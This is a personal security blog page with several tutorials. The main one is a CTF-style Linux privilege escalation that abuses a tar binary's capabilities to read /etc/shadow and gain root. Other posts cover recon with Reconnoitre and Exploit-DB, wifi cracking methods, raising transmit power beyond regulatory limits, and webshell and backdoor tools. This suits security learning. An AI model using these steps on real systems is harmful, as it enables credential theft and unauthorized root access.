nxnjz, Author at NXNJZ

An Interesting Privilege Escalation vector (getcap/setcap)

Posted on August 21, 2018 - February 16, 2019 by nxnjz

Introduction

I recently came across an interesting way of escalating privileges on a GNU/Linux system during a CTF challenge. It involves file/process capabilities.

In Linux, files may be given specific capabilities. For example, if an executable needs to access (read) files that are only readable by root, it is possible to give that file this ‘permission’ without having it run with complete root privileges. This allows for a more secure system in general. For more info about this subject, click here.

getcap and setcap are used to view and set capabilities, respectively. They usually belong to the libcap2-bin package on debian and debian-based distributions.

Privilege Escalation

We would start by scanning the file system for files with capabilities using getcap -r / The -r flag tells getcap to search recursively, ‘/‘ to indicate that we want to search the whole system.

The output is usually filled with tens or hundreds of “Operation not supported” errors, making it hard to read. We can redirect errors to /dev/null to get a cleaner output.

nxnjz@test-machine:~$ getcap -r / 2>/dev/null
/home/nxnjz/tar = cap_dac_read_search+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/mtr-packet = cap_net_raw+ep

An unusual finding: tar has cap_dac_read_search capabilities. This means it has read access to anything. We could use this to read SSH keys, or /etc/shadow and get password hashes.

/etc/shadow is usually only readable by root:

nxnjz@test-machine:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied

But since tar has that capability, we can archive /etc/shadow, extract it from the archive and read it.

nxnjz@test-machine:~$ ls
tar
nxnjz@test-machine:~$ ./tar -cvf shadow.tar /etc/shadow
./tar: Removing leading `/’ from member names
/etc/shadow
nxnjz@test-machine:~$ ls
shadow.tar tar
nxnjz@test-machine:~$ ./tar -xvf shadow.tar
etc/shadow
nxnjz@test-machine:~$ ls
etc shadow.tar tar
nxnjz@test-machine:~$ cat etc/shadow
root:$1$xyz$Bf.3hZ4SmETM3A78n1nWr.:17735:0:99999:7:::
daemon:*:17729:0:99999:7:::
bin:*:17729:0:99999:7:::
sys:*:17729:0:99999:7:::
sync:*:17729:0:99999:7:::
games:*:17729:0:99999:7:::
man:*:17729:0:99999:7:::
lp:*:17729:0:99999:7:::
mail:*:17729:0:99999:7:::
news:*:17729:0:99999:7:::
uucp:*:17729:0:99999:7:::
proxy:*:17729:0:99999:7:::
nxnjz:$1$sTfA$SnnNO9Cflvs4aq4ZCU/6J/:17764:0:99999:7:::

After cracking that password hash for root, which turns out to be ‘root1234’, we can login using su:

nxnjz@test-machine:~$ su root
Password:
root@test-machine:/home/nxnjz# whoami
root
root@test-machine:/home/nxnjz#

Conclusion & Mitigation

This is simply an example of how capabilities can serve as a privilege escalation vector. Another very useful capability in a scenario like this would be cap_dac_override, which allows full read/write/execute access. This obviously could be used in various ways to escalate privileges, including but not limited to, adding a root user to /etc/passwd or /etc/shadow, modifying cron jobs running by root, adding a public ssh key to /root/authorized_keys, or simply opening a root shell.

Keep in mind that the presence of a potentially exploitable capability does not guarantee privilege escalation. You’re still limited by the functionality of the executable in question.

Besides, capabilities are rarely used in the wild. System administrators rarely set/change capabilities.

System Administrators should make sure that no abusable or exploitable capabilities are assigned on their file system. Capabilities are generally safer than SUID, but they may still pose a risk.

Protected: Exploiting XXE

Posted on July 2, 2018 - May 15, 2020 by nxnjz

Searx Installation in a Docker Container on CentOS 7

Posted on June 28, 2018 - May 16, 2020 by nxnjz

Introduction

Searx is a meta-search engine that collects and aggregates results from a multitude of search engines including Google, Bing, and DuckDuckGo. It is free and open-source, and doesn’t track users nor collect any data. It can be quickly installed on your own server.You can use an online instance of Searx here.

This article will guide you through the deployment of a Searx instance in a Docker container on CentOS 7.

Preparations

The following command will update your system:

yum update -y
Git and Docker are required for this install:

yum install -y docker git
Start the Docker daemon and enable it to start at boot:

systemctl start docker; systemctl enable docker

Searx installation

First, clone the official Searx github repository:

git clone https://github.com/asciimoo/searx.git
Go into the searx directory and build with docker:

cd searx/ docker build -t searx .
This will install dependencies and build the container.

Finally, start the newly created container:

docker run -d --name searx -p 8888:8888 -e IMAGE_PROXY=True searx
You should be able to access your searx engine by browsing to YOUR_SERVER_IP:8888

Further information

After a reboot, docker will start automatically (since we enabled that in systemd), but the searx container will not. To start it manually after a reboot, run docker start searx

You can monitor CPU time and memory used by searx using docker stats searx

To stop searx, run docker stop searx

If port 8888 is not accessible after following this article, add it to firewalld. The following command will work in most cases:

firewall-cmd --zone=public --permanent --add-port=888/tcp
firewall-cmd --reload

List of security labs/challenges/CTFs

Posted on June 25, 2018 - May 4, 2020 by nxnjz

Listed below are some of the best websites and platforms where you can play hacking games, solve challenges, hack realistic systems and web applications, etc.

Metasploitable 2 (offline, free)

Metasploitable is a Linux virtual machine that you can download and set up on your system. It is vulnerable and exploitable in almost every way possible. Recommended for beginners. You can find the exploitability guide here.

Damn Vulnerable Web Application a.k.a DVWA (offline, free)

DVWA is a web app using PHP and MySQL that is extremely vulnerable. It is available both as a package that you can setup on your own webserver, or as a full iso file.

Download zip package (1.3MB, v1.9)
Download Live CD (480MB, v1.0.7)

HackTheBox.eu (online, free, optional VIP subscription)

Registration on HackTheBox requires you to ‘hack’ your way in. It is a simple task. If you find yourself unable to get the invite code by yourself, you will have a very hard time solving their challenges and hacking their boxes. Learn some more then try again.

Independent challenges : Reverse Engineering, Cryptography, Steganography, Web applications, and more.
Servers: From easily hackable in 2 hours to dozens of hours of nightmares.

OverTheWire.org (online, free)

You don’t need to register. Just choose a game (each game requires different skills) and try to progress through the levels. Most games are SSH based. Various levels of difficulty from very easy to extremely hard.

HackThisSite.org (online, free)

Different missions requiring different skillsets, each with multiple levels and varying difficulties. Registration is required and is straightforward.

VulnHub.com (offline, free)

VulnHub hosts a large number of virtual machines which you can download and run on your own system and try to hack them. The goal is to get root privileges on that virtual machine. Varying difficulty levels and required skillsets.

HackThis.co.uk (online, free)

This websites offers challenges, similar to hackthissite.org and hackthebox.eu challenges. Registration is required.

Game Of Hacks (online, free)

You have to find the vulnerability in a piece of code, as quickly as possible.

Others

WebGoat (OWASP project), instructions and downloads here.
Damn Vulnerable iOS application.
Google Gruyere, a very vulnerable web application based online, no need to download anything.
PentesterLab.
W3Challs, online challenges.
bWAPP, another extremely vulnerable web app available for download, just the app or pre-installed on a VM.
Hell Bound Hackers.
ThisIsLegal, online challenges.
Hackme
HackerTest.net, 20 online challenges.

This post is constantly updated, more resources will be added.

Information Gathering and Exploit Finding with Reconnoitre and Exploit-DB

Posted on June 23, 2018 - August 20, 2018 by nxnjz

Basics

The first step in any penetration test (or hacking) engagement is gathering information. The first part of that step is, in real world scenarios, OSINT or Open Source Intelligence.

This post is not about OSINT, it is about direct information gathering from the target, service enumeration and fingerprinting, and exploit finding; with an open source tool written in python : Reconnoitre.

Requirements

Reconnoitre (I will walk you through the installation)
Python (Usually installed by default on Linux)
A target IP address (Most websites now run on shared hosting, so by targeting the IP address of a particular website, you’re most likely targeting a decent server with several websites and services.)
A working internet connection if the target is not on a private network.

Installing Reconnoitre

From a terminal, run: git clone https://github.com/codingo/Reconnoitre.git (You may also manually get the files from here)
That’s it.

Usage

1. Navigate to the directory containing the python code:
cd Reconnoitre/reconnoitre/

2. Let’s take a quick look at the available options:

python reconnoitre.py -h

Reconnoitre usage

We obviously need -t to set the target or target range, -o to save all the results, and –services to scan for services.

We don’t need any other options for the default scan we’re gonna run.

So our command should be:
python reconnoitre.py --services -o [directory] -t [target-IP]

3. Start the scan with the command above.

Reconnoitre partial output

Reconnoitre will create a directory named after the target, in the specified output directory. It will then create 3 directories and 1 file inside it: loot, exploit, scans, and proof.txt. All results and findings will be written to those.

It will start with a quick nmap scan on the target, then a full TCP + UDP scan. The latter is especially useful when services are not running on the usual ports. The full scan will take a while.

Reconnoitre output

As you can see, the detailed scans didn’t find anything new, or so it seems.

4. Take a closer look at the findings:

Navigate to the newly created scans directory. You will find the outputs of 3 different scans: the quick scan, the full TCP scan, and the UDP scan. Each scan result is saved in different formats. XML, nmap (which is just regular nmap output), and gnmap (which is greppable). Take a look at each scan result, you will find detailed information including OS Versions and Service Versions, useful for finding potential exploits.

5. Further scans/attacks: cat [target]_findings.txt

Reconnoitre, depending on the results, will suggest relevant scans and attacks for each found service. Including but not limited to: nmap NSE scans, fingerprinting scans and brute force attacks. That is very useful.

Exploit-DB

Exploit-DB is a well known database of around 40,000 exploits of various types as of august 2018. It also hosts shellcode and security papers. You can access it here.

Consider the following Nmap output:

PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 Service Info: OS: Unix

We can see that it found vsftpd (a popular FTP server) running on port 21. It identified the version as 2.3.4. By looking up “vsftpd 2.3.4” on exploit-db, we find an exploit from 2011 that allows RCE. This means that we could obtain command-line access to this machine.

If you’re running Kali Linux, you can use ‘searchsploit’, a convenient CLI tool that allows you to search the exploit-db database from a terminal.

Usage is very simple, for example: searchsploit vsftpd 2.3.4

Increase the transmission power of a wifi card/adapter (txpower.)

Posted on June 22, 2018 - June 25, 2018 by nxnjz

Introduction

This tutorial will take you through some simple steps to increase the transmission power (txpower) of a wireless card.

This is not necessary for hacking wifi, but will usually increase your success rate, especially for targets that are far from you.

802.11 transmission powers are regulated in almost all countries. Following this tutorial may cause you to go over these regulations.

Requirements

Linux
A compatible wireless card with compatible drivers. Not all cards allow for higher transmission power.
Basic command-line knowledge.
Tools (installed by default on kali and many distros)

1. iw
2. iwconfig
3. ifconfig

Steps

1. Make sure you card is plugged in and working. You may run the following in a terminal to check:

iwconfig

You should see something like this:

My interface happens to be wlan1. Yours could be wlan0 or something else.

Look at the third line, Tx-Power=18 dBm, this is what we want to increase.

2. Next, we need to set the regulatory domain to one that allows higher transmission powers. On my system, ‘US‘ allows me to go up to 30 dBm. If it doesn’t work for you, try ‘BO‘ instead:

iw reg set US

iw reg set BO

3. Now run: iw reg get

(2402 - 2472 @ 40), (N/A, 30), (N/A) This line indicates that we can now go up to 30 dBm on 2.4Ghz channels.

4. Now take the interface down with ifconfig:

ifconfig wlan1 down

You should get no output, unless errors occured.

5. Set the txpower:
iwconfig wlan1 txpower 30

You should get no output.

6. Bring the interface up:

ifconfig wlan1 up

Again, no output.

7. Run iwconfig again to make sure everything worked:

As you can see, Tx-Power=30 dBm

Wifi

Posted on June 20, 2018 - August 20, 2018 by nxnjz

Basics

If you don’t know much about wireless networking, I highly recommend you read this introduction. And read this to learn the very basics of wifi security.

There are four main ways of obtaining a wifi password:

WEP cracking.
WPA/WPA2 wordlist/bruteforce attack.
WPS bruteforce / Pixie Dust.
Evil Twin Access Point. This involves social engineering.

What you should know before getting started

There are many compatibility issues between drivers, wifi chipsets, etc. You will need to choose a wifi card carefully if you want it to work.
Distance matters. The farther away a target is, the harder it is to successfully attack it. A more powerful wireless card with a high gain antenna is always helpful. Some wireless cards allow you to set their transmission power. Video Demo here.
Each target is different. You can’t expect something that works on a particular brand/model/firmware to work on any other brand/model/firmware. This is true for both access points and wifi cards.
A password is not always enough to gain access. For example, MAC filtering may still prevent you from connecting, even though you have the correct password. MAC spoofing can usually bypass that.
There are many, many tools available. Some will do everything for you automatically and may even have a nice graphical interface, others will require more skill and command-line knowledge. The latter group is more effective and flexible when employed successfully. The same goal can always be achieved using different tools.

Tutorials for Noobs

I will only list here popular methods using popular tools. If you’re familiar with the usual methods, skip this part.

Choose the one that suits you best.

WEP:

Using the aircrack-ng suite. (CLI)
Using besside-ng. This tool automates a few steps. (CLI)
Using Fern. (GUI)

WPA:

Using the aircrack-ng suite. (CLI)
Using Wifite. This tool automates many steps. (CLI)

WPS:

Using Reaver. (CLI)
Using Bully. (CLI)

WebShells

Posted on June 20, 2018 - August 20, 2018 by nxnjz

Basics

If you don’t understand what a shell is, click here.

A webshell is usually a web page that allows the user Operating System control, usually via a command line.

Many webshells also provide a graphical interface for ease of use.

You should only use a webshell when more conventional access, like SSH or the almost obsolete Telnet, is not available.

Some may work better than others, some may not work at all depending on the security measures employed by the target.

Watch out for webshells that are backdoored. While webshells are usually considered backdoors themselves, many of them will “phone home”, letting someone (whoever put the backdoor in place, usually the developer) know that they have been executed. That person may then use the backdoor themself for nefarious purposes. So make sure you look at the code before using a webshell, or look at HTTP traffic generated upon execution of the file. The latter will not necessarily show the existence of the backdoor in your shell. The files listed below are from reputable sources only, so you may trust them.

WebShells

- Laudanum at github: A collection of webshells in different languages.
- Antak PowerShell Aspx: Simple and works very well.
- WeBaCoo: Perl script for generating php backdoors, also allows to connect to a backdoor from your terminal for terminal-like access.
- Weevely: Powerful python script for generating backdoors, connecting to them, and running different modules to help with many tasks.